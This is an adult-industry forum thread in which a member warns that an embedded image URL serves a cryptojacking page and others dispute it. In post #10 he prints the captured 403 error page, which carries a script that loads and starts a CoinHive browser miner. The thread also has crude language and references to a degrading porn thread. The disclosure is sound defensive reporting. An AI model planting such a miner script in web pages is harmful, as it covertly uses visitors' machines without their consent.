![]() |
![]() |
![]() |
||||
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
![]() ![]() |
|
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
Thread Tools |
![]() |
#1 |
see you later, I'm gone
Industry Role:
Join Date: Oct 2002
Posts: 14,053
|
Stay Out Of The Homeless Porn Thread
There is an image link in several posts that will try to push a coin mining script on you.
The image url in question points at xxgasm dot com. It goes 403 or 404 and tries to push the script on you. I don't think the person who posted it meant to do it. I think they were just trying to link to an image. Not sure about that part, just a guess. You have been warned. Admin has been notified. Back to our normal broadcasting. .
__________________
All cookies cleared! |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#2 |
see you later, I'm gone
Industry Role:
Join Date: Oct 2002
Posts: 14,053
|
I just realized that my Norton is blocking the attack so I do NOT really know that status of the page coming back.
I am not seeing any image so I assumed the url was 404 but I am probably not seeing anything because antivirus is blocking it. On my phone the image url in question goes 404. I do NOT know if the script gets loaded there or not. .
__________________
All cookies cleared! |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#3 |
StraightBro
Industry Role:
Join Date: Aug 2003
Location: Monarch Beach, CA USA
Posts: 56,232
|
This is what I see
![]() ![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#4 |
see you later, I'm gone
Industry Role:
Join Date: Oct 2002
Posts: 14,053
|
It doesn't matter what you see.
The link to the xxgasm image is throwing an attack on my computer. I have no idea about anybody else's computer. That particular image url is triggering 2 attacks in a row for 2 different versions of a coinmining script. Look at the attacker url below. That is the image that you embedded from the xxgasm site. It is not coming from my computer. I assume other people are either getting it blocked or it is infecting them. I don't know for sure about anybody but me. ![]() ![]() .
__________________
All cookies cleared! |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#5 |
frc
Industry Role:
Join Date: Jul 2003
Location: Bitcoin wallet
Posts: 4,664
|
Thanks for the heads up. If I'm going to mine coins, I'd rather do it for myself
![]()
__________________
Crazy fast VPS for $10 a month. Try with $20 free credit |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#6 |
StraightBro
Industry Role:
Join Date: Aug 2003
Location: Monarch Beach, CA USA
Posts: 56,232
|
Yeah it looks like xxgasm.com is riddled with viruses. Sorry but no warnings came up posting that image from my phone. I think your Norton is blocking you from anything from that domain, not that the image itself delivers a virus or coining script
![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#7 |
see you later, I'm gone
Industry Role:
Join Date: Oct 2002
Posts: 14,053
|
Dude.
The attacking URL is where the attack came from. The blocking went into affect in response to the attack. Norton then puts that ip address on time out for 30 minutes. The image URL you posted is where the attack originated from. The images I posted show what happened. Norton blocked the coinmining scripts from being loaded. The url trying to load them is the image url you posted. There are 2 different scripts the site is trying to download. It is quite simple. Norton is NOT blocking anything from xxgasm until the attack occurs. READ the images I put up there. .
__________________
All cookies cleared! |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#8 |
StraightBro
Industry Role:
Join Date: Aug 2003
Location: Monarch Beach, CA USA
Posts: 56,232
|
You are trippin
Cryptojacking is when a webpage loads a mining javascript. Norton is flagging any elements from that domain. The image is not loading a script. Anyway, it's good people know to stay away 👍 Thank you 🤗 |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#9 |
Videochat Solutions
Industry Role:
Join Date: Aug 2004
Location: Canada
Posts: 48,529
|
Thanks sarettah. Pretty ugly thread anyway, and this just makes it much worse.
__________________
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#10 | |
see you later, I'm gone
Industry Role:
Join Date: Oct 2002
Posts: 14,053
|
Quote:
You are the one doing the tripping. I hit the image url with a curl call using a referal of gfy.com and the following code comes back. The page returns a 403 and then attempts to load a script through a custom 403 page. Code:
HTTP/1.1 403 Forbidden Server: nginx Date: Fri, 29 Dec 2017 13:33:30 GMT Content-Type: text/html Content-Length: 378 Connection: keep-alive ETag: "5a09c6d9-17a" <html> <head> <title>403 Forbidden</title> </head> <body bgcolor="white"> <center> <h1>403 Forbidden</h1> </center> <hr> <center>nginx</center> <script src="https://xxxxxxxxxx.com/lib/coinhive.min.js"></script> <script> var miner = new CoinHive.Anonymous(''); miner.start(); </script> <script src="http://www.google.com:81/"></script> </body> </html>
__________________
All cookies cleared! |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#11 |
StraightBro
Industry Role:
Join Date: Aug 2003
Location: Monarch Beach, CA USA
Posts: 56,232
|
How is giving fiscal opportunities to the homeless, along with an orgasm, an "ugly" thing?
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#12 | |
StraightBro
Industry Role:
Join Date: Aug 2003
Location: Monarch Beach, CA USA
Posts: 56,232
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#13 | |
So Fucking Banned
Industry Role:
Join Date: Jul 2003
Location: Montana
Posts: 46,238
|
Quote:
![]() btw I love the public shame you're trying to dump on me, tarnish my persona a bit maybe? a little passive aggressive lesson on 'not obeying your commands to think like you do?' boy that will teach me ![]() ![]() ![]() |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#14 | |
So Fucking Banned
Industry Role:
Join Date: Jul 2003
Location: Montana
Posts: 46,238
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#15 |
So Fucking Banned
Industry Role:
Join Date: Jul 2003
Location: Montana
Posts: 46,238
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#16 |
StraightBro
Industry Role:
Join Date: Aug 2003
Location: Monarch Beach, CA USA
Posts: 56,232
|
Here's a great article on what to look for
https://qz.com/1085171/how-to-tell-i...o-do-about-it/ "Researchers at IBM have found a more sophisticated class of surreptitious mining software that penetrates your system. These are delivered through infected image files or by clicking on links leading to a malicious site. Such attacks tend to target enterprise networks, IBM found, so get in touch with your IT person for help. If your system is infected, you should detect a degradation in performance, in which case fire up Activity Monitor or Task Manager to check your CPU usage. You can then identify the process that?s eating up all those compute cycles and terminate it from your resource monitor, says Dave McMillen of IBM Managed Security Services, who authored the research on secret crypto miners." |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#17 | |
see you later, I'm gone
Industry Role:
Join Date: Oct 2002
Posts: 14,053
|
Quote:
I think that this version of it would only run when you had the webpage open. Not 100% sure on that but I think so. So, it might not be as malicious in intent. But I have a problem with anything running on my system without my permission. If someone wants to mine coins instead of run advertising they should announce that instead of just loading it up. .
__________________
All cookies cleared! |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#18 |
StraightBro
Industry Role:
Join Date: Aug 2003
Location: Monarch Beach, CA USA
Posts: 56,232
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#19 |
Confirmed User
Join Date: Jul 2007
Location: OC
Posts: 3,014
|
I see the attack also, looks like a crypto miner is making a killing off all of Bladewires posting.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#20 | |
So Fucking Banned
Industry Role:
Join Date: Jul 2003
Location: Montana
Posts: 46,238
|
Quote:
|
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#21 |
It's all goooood.
Industry Role:
Join Date: Aug 2009
Location: The Hoe Stroll
Posts: 1,591
|
it's funny. I did exactly this to a mennonite woman I dated a few months back... well, minus the peeing part because I don't sleep in piss.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#22 |
visit hardlinks.org
Industry Role:
Join Date: Jun 2003
Location: Las Vegas , Nv >>> [email protected] or icq 94994627 anytime
Posts: 18,362
|
Bump for knowledge
Ray Hardlinks.org |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#23 |
StraightBro
Industry Role:
Join Date: Aug 2003
Location: Monarch Beach, CA USA
Posts: 56,232
|
^^^ This
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#24 |
FUBAR the ORIGINATOR
Industry Role:
Join Date: Jan 2002
Location: FUBARLAND
Posts: 67,382
|
__________________
![]() FUBAR Webmasters - The FUBAR Times - FUBAR Webmasters Mobile - FUBARTV.XXX For promo opps contact jfk at fubarwebmasters dot com |
![]() |
![]() ![]() ![]() ![]() ![]() |